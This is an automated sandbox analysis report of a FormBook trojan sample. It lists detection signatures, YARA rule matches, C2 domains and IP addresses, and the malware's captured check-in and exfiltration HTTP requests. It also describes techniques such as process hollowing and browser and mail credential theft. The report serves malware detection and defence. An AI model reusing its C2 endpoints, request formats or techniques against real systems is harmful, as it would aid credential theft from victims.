Windows Analysis Report
qHpeBvr9cR.exe

Overview

General Information

Sample Name: qHpeBvr9cR.exe
Analysis ID: 756313
MD5: f5bea76ffac05afbe19274595801184e
SHA1: 93ef457bfcbc5f0860b1b7f6353ed6e9b0afd60e
SHA256: 40dcfb704112265b383679baa3064cd7355bd02119b117f396e1b0283342362c
Tags: 32, exe, Formbook, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: qHpeBvr9cR.exe ReversingLabs: Detection: 41%
Source: qHpeBvr9cR.exe Virustotal: Detection: 36%
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X Avira URL Cloud: Label: malware
Source: http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X Avira URL Cloud: Label: malware
Source: www.brennancorps.info/henz/ Avira URL Cloud: Label: malware
Source: http://www.patrickguarte.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.lyonfinancialusa.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.afterdarksocial.club/henz/ Avira URL Cloud: Label: malware
Source: eufidelizo.com Virustotal: Detection: 8%
Source: www.eufidelizo.com Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe ReversingLabs: Detection: 20%
Source: qHpeBvr9cR.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Joe Sandbox ML: detected
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.brennancorps.info/henz/"]}
Source: qHpeBvr9cR.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: netsh.pdb source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B25293 FindFirstFileExW, 1_2_00B25293
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00B25347
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B25293 FindFirstFileExW, 2_2_00B25293
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 2_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 2_2_00B25347

Networking

Source: C:\Windows\explorer.exe Domain query: www.patrickguarte.com
Source: C:\Windows\explorer.exe Network Connect: 155.159.61.221 80
Source: C:\Windows\explorer.exe Domain query: www.eufidelizo.com
Source: C:\Windows\explorer.exe Domain query: www.lyonfinancialusa.com
Source: C:\Windows\explorer.exe Domain query: www.afterdarksocial.club
Source: C:\Windows\explorer.exe Network Connect: 192.185.217.47 80
Source: C:\Windows\explorer.exe Network Connect: 206.233.197.135 80
Source: C:\Windows\explorer.exe Network Connect: 162.214.129.149 80
Source: C:\Windows\explorer.exe Domain query: www.19t221013d.tokyo
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
Source: Malware configuration extractor URLs: www.brennancorps.info/henz/
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: COGENT-174US
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X HTTP/1.1 Host: www.eufidelizo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw==&8p08qr=2d0X HTTP/1.1 Host: www.lyonfinancialusa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/ZSQN3PeXGVgYZcA==&8p08qr=2d0X HTTP/1.1 Host: www.afterdarksocial.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X HTTP/1.1 Host: www.patrickguarte.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 192.185.217.47
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1 Host: www.lyonfinancialusa.com Connection: close Content-Length: 189 Cache-Control: no-cache Origin: http://www.lyonfinancialusa.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.lyonfinancialusa.com/henz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Ascii: ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1 Host: www.afterdarksocial.club Connection: close Content-Length: 189 Cache-Control: no-cache Origin: http://www.afterdarksocial.club User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.afterdarksocial.club/henz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Ascii: ChMxG4C=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jCxS3(dw-lKsshGSVcA).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1 Host: www.patrickguarte.com Connection: close Content-Length: 189 Cache-Control: no-cache Origin: http://www.patrickguarte.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.patrickguarte.com/henz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Ascii: ChMxG4C=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63ip072G5LDWVUDNF~GIA).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 30 Nov 2022 00:10:29 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 29 Sep 2022 21:55:23 GMT Accept-Ranges: bytes Content-Length: 11816 Vary: Accept-Encoding Content-Type: text/html
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 30 Nov 2022 00:10:48 GMT Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Accept-Ranges: bytes Connection: close Transfer-Encoding: chunked Content-Type: text/html
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 30 Nov 2022 00:10:50 GMT Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Accept-Ranges: bytes Connection: close Transfer-Encoding: chunked Content-Type: text/html
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Nov 2022 00:10:56 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 30 Nov 2022 00:10:58 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
Source: netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://gmpg.org/xfn/11
Source: qHpeBvr9cR.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: qHpeBvr9cR.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000003.00000000.356156439.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.336262975.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: -ODfqI49.5.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: -ODfqI49.5.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: -ODfqI49.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: -ODfqI49.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netsh.exe, 00000005.00000002.565816613.0000000003CE8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.lyonfinancialusa.com/henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIsz
Source: unknown HTTP traffic detected: POST /henz/ HTTP/1.1 Host: www.lyonfinancialusa.com Connection: close Content-Length: 189 Cache-Control: no-cache Origin: http://www.lyonfinancialusa.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.lyonfinancialusa.com/henz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Ascii: ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw).
Source: unknown DNS traffic detected: queries for: www.eufidelizo.com
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1ACA0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard, 1_2_00B1ACA0
Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe Code function: 1_2_00B1B830 GetKeyboardState, 1_2_00B1B830
Source: C:\Users\user\Desktop\qHpeBvr9cR.exe Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405125

E-Banking Fraud

Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: febcldoukq.exe PID: 5828, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: netsh.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: qHpeBvr9cR.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
